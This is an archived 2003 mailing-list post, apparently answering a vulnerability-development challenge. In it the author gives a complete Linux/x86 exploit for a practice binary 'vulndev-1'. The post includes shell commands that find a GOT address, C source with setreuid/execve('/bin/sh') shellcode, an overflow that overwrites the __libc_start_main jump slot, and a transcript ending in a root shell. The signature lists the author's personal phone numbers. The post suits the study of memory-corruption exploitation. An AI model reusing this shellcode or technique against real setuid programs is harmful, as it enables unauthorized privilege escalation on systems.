Dear Vulnerability Developers, Thanks to your remarkably insightful analysis of this utterly complex bug. Heh. Anyway, here's what I come up with. Analyze this! ;-) PS. Greets to Doug Lee! [je@vudo ~]$ ADDR=`objdump -R vulndev-1 | awk '$3 == "__libc_start_main" { print $1 }' [je@vudo ~]$ echo $ADDR 08049610 [je@vudo ~]$ cat<<EOF>expldev-1.c /* * Exploit (Linux/x86) for vulndev-1. * * 2003-05-13 - Joel Eriksson (je at 0xbadc0ded.org) */ #include <stdlib.h> #include <string.h> #include <unistd.h> #include <stdio.h> char code[] = "\xeb\x0e" "AAAAAAAAAAAAAA" /* jmp 0x0e ; unlink() is evil. */ \ /* setreuid(0,0) */ \ "\x31\xc0" /* xor %eax,%eax */ \ "\x31\xdb" /* xor %ebx,%ebx */ \ "\x31\xc9" /* xor %ecx,%ecx */ \ "\xb0\x46" /* mov $0x46,%al */ \ "\xcd\x80" /* int $0x80 */ \ /* execve("/bin/sh", "/bin/sh", NULL) */ \ "\x31\xd2" /* xorl %edx,%edx */ \ "\x52" /* pushl %edx */ \ "\x68\x6e\x2f\x73\x68" /* pushl $0x68732f6e */ \ "\x68\x2f\x2f\x62\x69" /* pushl $0x69622f2f */ \ "\x89\xe3" /* movl %esp,%ebx */ \ "\x52" /* pushl %edx */ \ "\x53" /* pushl %ebx */ \ "\x89\xe1" /* movl %esp,%ecx */ \ "\x8d\x42\x0b" /* leal 0xb(%edx),%eax */ \ "\xcd\x80"; /* int $0x80 */ #define DEF_PROG "./vulndev-1" #define DEF_ADDR $ADDR /* __libc_start_main GOT-jumpslot */ #define BUF_SIZE 252 #define BOF_SIZE 1 int main(int argc, char **argv) { unsigned int code_addr = 0xc0000000 - 4, dest_addr = DEF_ADDR; char *envp[] = { code, NULL }; char *prog = DEF_PROG; char arg1[BUF_SIZE+BOF_SIZE+1]; char arg2[9]; if (argc >= 2) prog = argv[1]; if (argc >= 3) dest_addr = strtoul(argv[2], NULL, 16); memset(arg1, 'A', BUF_SIZE+BOF_SIZE); arg1[sizeof(arg1)-1] = '\0'; code_addr -= strlen(prog) + 1; code_addr -= strlen(code) + 1; *((unsigned int *) &arg2[0]) = code_addr; *((unsigned int *) &arg2[4]) = dest_addr; fprintf(stderr, "0x%08x\n", code_addr); execle(prog, prog, arg1, arg2, NULL, envp); perror("exec"); return 1; } EOF [je@vudo ~]$ gcc -o expldev-1 expldev-1.c [je@vudo ~]$ ./expldev-1 0xbfffffbd sh-2.05b# whoami root sh-2.05b# -- Joel Eriksson <jeat_private> ------------------------------------------------- Cellphone: +46-70-288 64 16 Home: +46-26-10 23 37 Security Research & Systems Development at Bitnux PGP Key Server pgp.mit.edu, PGP Key ID 0x529FDBD1 A615 A1E1 3CA2 D7C2 CFEA 47B4 7EF7 E6B2 529F DBD1 -------------------------------------------------
This archive was generated by hypermail 2b30 : Wed May 14 2003 - 08:21:32 PDT